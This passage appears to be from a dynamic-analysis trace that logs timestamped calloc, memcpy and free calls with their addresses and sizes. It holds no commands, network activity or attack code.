_Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.472] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.472] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.472] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.473] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.473] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.473] free (_Block=0x2064b70) [0068.474] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.474] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.474] free (_Block=0x2064b70) [0068.474] free (_Block=0x2062b70) [0068.474] free (_Block=0x2062c88) [0068.475] free (_Block=0x2060448) [0068.475] free (_Block=0x2062eb8) [0068.475] free (_Block=0x2060060) [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x20610a0 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2061010 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2060f80 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2060ef0 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2060e60 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2060dd0 [0068.475] calloc (_Count=0x21, _Size=0x4) returned 0x2060d40 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2060cb0 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2060c20 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2060b90 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2060b00 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2060a70 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x20609e0 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2060950 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x20612e0 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2061370 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2061400 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2061490 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2061520 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x20615b0 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2061640 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x20616d0 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x2061760 [0068.476] calloc (_Count=0x21, _Size=0x4) returned 0x20617f0 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x2061880 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x2061910 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x20619a0 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x2061a30 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x2061ac0 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x2061b50 [0068.477] calloc (_Count=0x21, _Size=0x4) returned 0x2061be0 [0068.483] free (_Block=0x2061130) [0068.484] free (_Block=0x20610a0) [0068.485] free (_Block=0x2061010) [0068.485] free (_Block=0x2060f80) [0068.485] free (_Block=0x2060ef0) [0068.486] free (_Block=0x2060e60) [0068.486] free (_Block=0x2060dd0) [0068.486] free (_Block=0x2060d40) [0068.487] free (_Block=0x2060cb0) [0068.487] free (_Block=0x2060c20) [0068.487] free (_Block=0x2060b90) [0068.488] free (_Block=0x2060b00) [0068.488] free (_Block=0x2060a70) [0068.488] free (_Block=0x20609e0) [0068.488] free (_Block=0x2060950) [0068.489] free (_Block=0x20612e0) [0068.489] free (_Block=0x2061370) [0068.489] free (_Block=0x2061400) [0068.489] free (_Block=0x2061490) [0068.490] free (_Block=0x2061520) [0068.490] free (_Block=0x20615b0) [0068.491] free (_Block=0x2061640) [0068.491] free (_Block=0x20616d0) [0068.491] free (_Block=0x2061760) [0068.492] free (_Block=0x20617f0) [0068.492] free (_Block=0x2061880) [0068.492] free (_Block=0x2061910) [0068.492] free (_Block=0x20619a0) [0068.493] free (_Block=0x2061a30) [0068.493] free (_Block=0x2061ac0) [0068.493] free (_Block=0x2061b50) [0068.493] free (_Block=0x2061be0) [0068.494] free (_Block=0x20611c0) [0068.494] free (_Block=0x2062da0) [0068.494] free (_Block=0x53d8d8) [0068.494] free (_Block=0x53dc08) [0068.494] free (_Block=0x2061250) [0068.495] free (_Block=0x2062fd0) [0068.495] calloc (_Count=0x20, _Size=0x4) returned 0x53dc08 [0068.495] memcpy (in: _Dst=0x53dc08, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53dc08) returned 0x53dc08 [0068.495] calloc (_Count=0x20, _Size=0x4) returned 0x53d8d8 [0068.495] memcpy (in: _Dst=0x53d8d8, _Src=0x53dc08, _Size=0x80 | out: _Dst=0x53d8d8) returned 0x53d8d8 [0068.495] calloc (_Count=0x20, _Size=0x4) returned 0x53dc90 [0068.495] calloc (_Count=0x21, _Size=0x4) returned 0x2061250 [0068.495] memcpy (in: _Dst=0x2061250, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061250) returned 0x2061250 [0068.495] free (_Block=0x53dc90) [0068.495] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0068.495] calloc (_Count=0x42, _Size=0x4) returned 0x2062fd0 [0068.495] calloc (_Count=0x1, _Size=0x4) returned 0x2064b70 [0068.495] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0068.495] memcpy (in: _Dst=0x2062da0, _Src=0x2064b70, _Size=0x4 | out: _Dst=0x2062da0) returned 0x2062da0 [0068.495] free (_Block=0x2064b70) [0068.495] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0068.495] memcpy (in: _Dst=0x2062eb8, _Src=0x2062da0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0068.496] calloc (_Count=0x20, _Size=0x4) returned 0x53dc90 [0068.496] memcpy (in: _Dst=0x53dc90, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53dc90) returned 0x53dc90 [0068.496] calloc (_Count=0x43, _Size=0x4) returned 0x2060448 [0068.496] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.496] calloc (_Count=0x3, _Size=0x4) returned 0x2060060 [0068.496] calloc (_Count=0x21, _Size=0x4) returned 0x2061be0 [0068.496] memcpy (in: _Dst=0x2061be0, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061be0) returned 0x2061be0 [0068.496] free (_Block=0x53dc90) [0068.496] calloc (_Count=0x41, _Size=0x4) returned 0x2062c88 [0068.496] memcpy (in: _Dst=0x2062c88, _Src=0x2061be0, _Size=0x84 | out: _Dst=0x2062c88) returned 0x2062c88 [0068.496] free (_Block=0x2061be0) [0068.496] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.496] memcpy (in: _Dst=0x2064b80, _Src=0x2064b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.496] calloc (_Count=0x3, _Size=0x4) returned 0x2060078 [0068.496] memcpy (in: _Dst=0x2060078, _Src=0x2064b70, _Size=0x8 | out: _Dst=0x2060078) returned 0x2060078 [0068.496] free (_Block=0x2064b70) [0068.496] free (_Block=0x2064b80) [0068.496] calloc (_Count=0x22, _Size=0x4) returned 0x2061be0 [0068.496] memcpy (in: _Dst=0x2061be0, _Src=0x2060078, _Size=0xc | out: _Dst=0x2061be0) returned 0x2061be0 [0068.496] free (_Block=0x2060078) [0068.496] calloc (_Count=0x41, _Size=0x4) returned 0x2062b70 [0068.497] memcpy (in: _Dst=0x2062b70, _Src=0x2061be0, _Size=0x88 | out: _Dst=0x2062b70) returned 0x2062b70 [0068.497] free (_Block=0x2061be0) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.497] free (_Block=0x2064b80) [0068.497] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.497] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.498] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.498] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.498] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.499] free (_Block=0x2064b80) [0068.499] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.499] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.500] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.500] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.500] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.501] free (_Block=0x2064b80) [0068.501] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.501] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.502] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.502] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.502] free (_Block=0x2064b80) [0068.503] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.503] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.503] free (_Block=0x2064b80) [0068.503] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.503] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.503] free (_Block=0x2064b80) [0068.503] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.503] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.503] free (_Block=0x2064b80) [0068.503] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.503] memcpy (in: _Dst=0x2064b80, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x2064b80) returned 0x2064b80 [0068.503] free (_Block=0x2064b80) [0068.503] free (_Block=0x2062eb8) [0068.503] free (_Block=0x2062c88) [0068.504] free (_Block=0x2060448) [0068.504] free (_Block=0x2062b70) [0068.504] free (_Block=0x2060060) [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061be0 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061b50 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061ac0 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061a30 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x20619a0 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061910 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061880 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x20617f0 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061760 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x20616d0 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061640 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x20615b0 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061520 [0068.504] calloc (_Count=0x21, _Size=0x4) returned 0x2061490 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2061400 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2061370 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x20612e0 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060950 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x20609e0 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060a70 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060b00 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060b90 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060c20 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060cb0 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060d40 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060dd0 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060e60 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060ef0 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2060f80 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2061010 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x20610a0 [0068.505] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0068.509] free (_Block=0x2061be0) [0068.510] free (_Block=0x2061b50) [0068.510] free (_Block=0x2061ac0) [0068.510] free (_Block=0x2061a30) [0068.510] free (_Block=0x20619a0) [0068.510] free (_Block=0x2061910) [0068.511] free (_Block=0x2061880) [0068.511] free (_Block=0x20617f0) [0068.511] free (_Block=0x2061760) [0068.511] free (_Block=0x20616d0) [0068.512] free (_Block=0x2061640) [0068.512] free (_Block=0x20615b0) [0068.512] free (_Block=0x2061520) [0068.512] free (_Block=0x2061490) [0068.513] 